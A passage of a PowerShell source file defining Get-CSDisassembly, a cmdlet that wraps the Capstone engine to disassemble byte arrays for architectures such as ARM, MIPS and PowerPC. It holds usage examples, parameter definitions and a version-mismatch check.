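Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes -DetailOn

$Bytes = [Byte[]] @( 0x21, 0x7c, 0x02, 0x9b, 0x21, 0x7c, 0x00, 0x53, 0x00, 0x40, 0x21, 0x4b, 0xe1, 0x0b, 0x40, 0xb9 )
Get-CSDisassembly -Architecture Arm64 -Mode Arm -Code $Bytes

$Bytes = [Byte[]] @( 0x0C, 0x10, 0x00, 0x97, 0x00, 0x00, 0x00, 0x00, 0x24, 0x02, 0x00, 0x0c, 0x8f, 0xa2, 0x00, 0x00, 0x34, 0x21, 0x34, 0x56 )
Get-CSDisassembly -Architecture Mips -Mode 'Mode32, BigEndian' -Code $Bytes

$Bytes = [Byte[]] @( 0x56, 0x34, 0x21, 0x34, 0xc2, 0x17, 0x01, 0x00 )
Get-CSDisassembly -Architecture Mips -Mode 'Mode64, LittleEndian' -Code $Bytes

$Bytes = [Byte[]] @( 0x80, 0x20, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x10, 0x43, 0x23, 0x0e, 0xd0, 0x44, 0x00, 0x80, 0x4c, 0x43, 0x22, 0x02, 0x2d, 0x03, 0x00, 0x80, 0x7c, 0x43, 0x20, 0x14, 0x7c, 0x43, 0x20, 0x93, 0x4f, 0x20, 0x00, 0x21, 0x4c, 0xc8, 0x00, 0x21 )
Get-CSDisassembly -Architecture PPC -Mode BigEndian -Code $Bytes

.INPUTS

None

You cannot pipe objects to Get-CSDisassembly.

.OUTPUTS

Capstone.Instruction[]

Get-CSDisassembly returns an array of Instruction objects.
#>

    [OutputType([Capstone.Instruction])]
    [CmdletBinding(DefaultParameterSetName = 'Disassemble')]
    Param (
        [Parameter(Mandatory, ParameterSetName = 'Disassemble')]
        [Capstone.Architecture]
        $Architecture,

        [Parameter(Mandatory, ParameterSetName = 'Disassemble')]
        [Capstone.Mode]
        $Mode,

        [Parameter(Mandatory, ParameterSetName = 'Disassemble')]
        [ValidateNotNullOrEmpty()]
        [Byte[]]
        $Code,

        [Parameter( ParameterSetName = 'Disassemble' )]
        [UInt64]
        $Offset = 0,

        # Passed straight through to the binding; 0 presumably means "no limit" - confirm in capstone.dll.
        [Parameter( ParameterSetName = 'Disassemble' )]
        [UInt32]
        $Count = 0,

        [Parameter( ParameterSetName = 'Disassemble' )]
        [ValidateSet('Intel', 'ATT')]
        [String]
        $Syntax,

        [Parameter( ParameterSetName = 'Disassemble' )]
        [Switch]
        $DetailOn,

        [Parameter( ParameterSetName = 'Version' )]
        [Switch]
        $Version
    )

    if ($PsCmdlet.ParameterSetName -eq 'Version')
    {
        # An engine instance is needed just to read the version; X86/Mode16 is an arbitrary choice.
        $Disassembly = New-Object Capstone.Capstone([Capstone.Architecture]::X86, [Capstone.Mode]::Mode16)
        $Disassembly.Version

        return
    }

    $Disassembly = New-Object Capstone.Capstone($Architecture, $Mode)

    # The managed binding and the native library must be the same version; the original
    # author notes that undefined behavior is likely otherwise, and $Code is frequently
    # untrusted input. The check stays non-terminating so existing callers are not broken;
    # the message now reports both versions so a reader can tell which side is stale.
    if ($Disassembly.Version -ne [Capstone.Capstone]::BindingVersion)
    {
        Write-Error "libcapstone.dll version ($($Disassembly.Version)) does not match the capstone.dll binding version ($([Capstone.Capstone]::BindingVersion.ToString())). Undefined behavior is likely."
    }

    if ($Syntax)
    {
        # ValidateSet guarantees one of these two values.
        switch ($Syntax)
        {
            'Intel' { $SyntaxMode = [Capstone.OptionValue]::SyntaxIntel }
            'ATT' { $SyntaxMode = [Capstone.OptionValue]::SyntaxATT }
        }

        $Disassembly.SetSyntax($SyntaxMode)
    }

    if ($DetailOn)
    {
        $Disassembly.SetDetail($True)
    }

    $Disassembly.Disassemble($Code, $Offset, $Count)
}
--------------------------------------------------------------------------------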